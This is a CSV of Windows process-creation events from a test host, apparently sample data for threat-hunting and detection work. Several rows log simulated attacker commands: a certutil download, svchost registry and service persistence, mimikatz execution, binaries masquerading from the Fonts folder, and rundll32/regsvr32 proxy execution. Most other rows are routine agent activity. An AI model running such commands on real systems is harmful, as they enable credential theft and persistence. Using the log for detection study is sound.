214,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.447,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1638,C:\Diagnostics\UserTmp\certutil.exe,%%1936,0xbc8,certutil  -urlcache -split -f http://127.0.0.1/ ,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.447
215,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.490,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1624,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,".\reg  add ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\MyNastySvcHostConfig""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.490
216,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.537,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1628,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,".\reg  delete ""HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\MyNastySvcHostConfig""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.537
217,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.583,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1654,C:\Windows\System32\sc.exe,%%1936,0xbc8,"sc  create MSTICTestService binPath=C:\Users\MSTICA~1\AppData\Local\Temp\hd.exe DisplayName=""Test Service""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.583
218,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:19.617,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x169c,C:\Windows\System32\sc.exe,%%1936,0xbc8,sc  delete MSTICTestService,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:19.617
219,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:20.623,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1694,C:\Windows\System32\wermgr.exe,%%1936,0x440,C:\Windows\system32\wermgr.exe -upload,C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:20.623
220,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:26.013,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x16c4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:26.013
221,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.033,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1724,C:\Diagnostics\UserTmp\cmd.exe,%%1936,0xbc8,"cmd  /c ""echo blahtest > \\.\pipe\blahtest""",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.033
222,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.100,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1744,C:\Windows\System32\win32calc.exe,%%1936,0x1724,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.100
223,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.157,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1758,C:\Diagnostics\UserTmp\reg.exe,%%1936,0xbc8,".\reg.exe   add ""hkcu\console"" /v windowposition /t reg_dword /d 33554556 /f",C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.157
224,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.227,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1778,C:\Windows\System32\win32calc.exe,%%1936,0x1758,"""C:\Windows\System32\win32calc.exe"" ",C:\Diagnostics\UserTmp\reg.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.227
225,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.293,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x178c,C:\Windows\Fonts\csrss.exe,%%1936,0xbc8,c:\windows\fonts\csrss.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.293
226,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.377,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17ac,C:\Windows\System32\win32calc.exe,%%1936,0x178c,"""C:\Windows\System32\win32calc.exe"" ",C:\Windows\Fonts\csrss.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.377
227,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.453,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17bc,C:\Windows\System32\win32calc.exe,%%1936,0x17ac,"""C:\Windows\System32\win32calc.exe"" ",C:\Windows\System32\win32calc.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.453
228,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:14.453,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x17c0,C:\Windows\System32\svchost.exe,%%1936,0x230,C:\Windows\System32\svchost.exe -k WerSvcGroup,C:\Windows\System32\services.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.453
229,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:15:14.490,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x17dc,C:\Windows\System32\WerFault.exe,%%1936,0x17ac,C:\Windows\system32\WerFault.exe -u -p 6060 -s 472,C:\Windows\System32\win32calc.exe,0xfaac27,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.490
230,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.493,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x17e4,C:\Windows\Fonts\conhost.exe,%%1936,0xbc8,c:\windows\fonts\conhost.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.493
231,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.563,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1440,C:\Diagnostics\UserTmp\mimikatz.exe,%%1936,0xbc8,.\mimikatz.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.563
232,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.613,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1434,C:\Diagnostics\UserTmp\rundll32.exe,%%1936,0xbc8,.\rundll32.exe  /C c:\windows\fonts\conhost.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.613
233,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.640,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x1424,C:\Windows\Fonts\conhost.exe,%%1936,0x1434,c:\windows\fonts\conhost.exe,C:\Diagnostics\UserTmp\rundll32.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.640
234,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.693,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x123c,C:\Diagnostics\UserTmp\regsvr32.exe,%%1936,0xbc8,.\regsvr32  /u /s c:\windows\fonts\csrss.exe,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.693
235,802d39e1-9d70-404d-832c-2de5e2478eda,MSTICAlertsWin1\MSTICAdmin,4688,2019-01-15 05:15:14.770,MSTICAlertsWin1,S-1-5-21-996632719-2361334927-4038480536-500,MSTICAdmin,MSTICAlertsWin1,0xfaac27,0x240,C:\Windows\System32\tasklist.exe,%%1936,0xbc8,tasklist,C:\Windows\System32\cmd.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:15:14.770
236,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:05:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1040,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:05:26.000
237,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:06:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x690,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:06:24.000
238,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:06:24.043,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11ac,C:\Windows\System32\conhost.exe,%%1936,0x690,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:06:24.043
239,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:06:25.770,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd04,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:06:25.770
240,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 05:06:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xc18,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 05:06:26.000
241,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:34:24.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x13e4,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:34:24.010
242,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:34:24.030,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10e4,C:\Windows\System32\conhost.exe,%%1936,0x13e4,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:34:24.030
243,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:34:25.583,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x90c,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:34:25.583
244,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:34:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xfbc,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:34:26.000
245,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:25:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xbdc,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:25:26.000
246,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:26:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x57c,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:26:24.000
247,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:26:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x10fc,C:\Windows\System32\conhost.exe,%%1936,0x57c,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:26:24.017
248,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:26:25.833,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd78,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:26:25.833
249,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:26:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1054,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:26:26.007
250,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:41:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x12dc,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:41:26.000
251,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:42:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xb8,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:42:24.000
252,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:42:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11b4,C:\Windows\System32\conhost.exe,%%1936,0xb8,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:42:24.017
253,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:42:25.387,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1020,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:42:25.387
254,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:42:25.437,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xd80,C:\Windows\System32\MusNotification.exe,%%1936,0x440,C:\Windows\system32\MusNotification.exe Display,C:\Windows\System32\svchost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:42:25.437
255,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:42:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xbdc,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:42:26.007
256,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:43:05.240,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x690,C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\CollectGuestLogs.exe,%%1936,0xa40,"""CollectGuestLogs.exe"" -Mode:ga -FileName:C:\WindowsAzure\CollectGuestLogsTemp\710dc858-9c96-4df5-bd9b-e932e7433077.zip",C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\WaAppAgent.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:43:05.240
257,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:43:05.253,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x6d4,C:\Windows\System32\conhost.exe,%%1936,0x690,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\WindowsAzure\GuestAgent_2.7.41491.901_2019-01-14_202614\CollectGuestLogs.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:43:05.253
258,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:43:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x54c,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:43:26.000
259,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:19:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x93c,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:19:26.000
260,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:20:24.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x138c,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:20:24.000
261,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:20:24.017,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x1258,C:\Windows\System32\conhost.exe,%%1936,0x138c,\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:20:24.017
262,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:20:25.423,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xf94,C:\Windows\SysWOW64\wbem\WmiPrvSE.exe,%%1936,0x280,C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding,C:\Windows\System32\svchost.exe,0x3e4,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:20:25.423
263,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:20:26.007,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x123c,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:20:26.007
264,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:31:26.000,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0x11e4,C:\Windows\System32\cscript.exe,%%1936,0x888,"""C:\Windows\system32\cscript.exe"" /nologo ""MonitorKnowledgeDiscovery.vbs""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:31:26.000
265,802d39e1-9d70-404d-832c-2de5e2478eda,WORKGROUP\MSTICAlertsWin1$,4688,2019-01-15 04:32:24.010,MSTICAlertsWin1,S-1-5-18,MSTICAlertsWin1$,WORKGROUP,0x3e7,0xa08,C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe,%%1936,0x888,"""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\NativeDSC\DesiredStateConfiguration\ASMHost.exe"" GetInventory ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState\ServiceState.mof"" ""C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\CT_602681692\work\ServiceState""",C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe,0x0,46fe7078-61bb-4bed-9430-7ac01d91c273,2019-01-15 04:32:24.010
